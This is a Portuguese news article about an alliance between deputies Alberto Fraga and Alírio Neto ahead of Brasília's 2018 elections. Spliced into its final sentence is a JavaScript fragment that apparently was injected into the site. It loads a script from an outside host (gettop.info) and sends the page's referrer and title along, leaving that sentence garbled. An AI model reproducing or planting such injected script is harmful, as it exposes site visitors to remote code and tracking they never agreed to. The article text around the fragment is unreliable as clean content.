Fraga e Alírio se unem para eleições de 2018

Alírio Neto (esq.) e Alberto Fraga em restaurante da Câmara dos Deputados. Foto: Reprodução/Facebook

 

O deputado federal Alberto Fraga (DEM) e o ex-distrital Alírio Neto (PTB) fecharam uma aliança para formar uma chapa majoritária nas eleições de 2018, independentemente do cargo pleiteado por um ou pelo outro.

Oposicionistas ao governo de Rodrigo Rollemberg, os nomes dos dois são especulados como candidatos ao Palácio do Buriti. Fraga foi o deputado mais votado nas últimas eleições, em 2014, quando recebeu 155.056 votos. Coronel da PM na reserva, o parlamentar direciona seus discursos para a segurança pública.

Em contrapartida, Alírio Neto, à época filiado ao PEN, foi o deputado mais votado a não conseguir um cargo eletivo, com 78.945. O eleito na coligação “Respeito por Brasília”, na qual seu partido fazia parte, foi eleito Roney Nemer, que era filiado ao PMDB.

Redes sociais

O anúncio da parceria foi feito no perfil do deputado Alberto Fraga no Facebook com a legenda “juntos por Brasília”. Entre elogios e críticas, os principais comentários dos usuários se referiam-se à Reforma da Previdência, que está sendo votada na Câmara dos Deputados.

O acordo de Fraga e Alírio foi fechado em almoço num restaurante da Câmara dos Deputados quarta-feira (3).s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário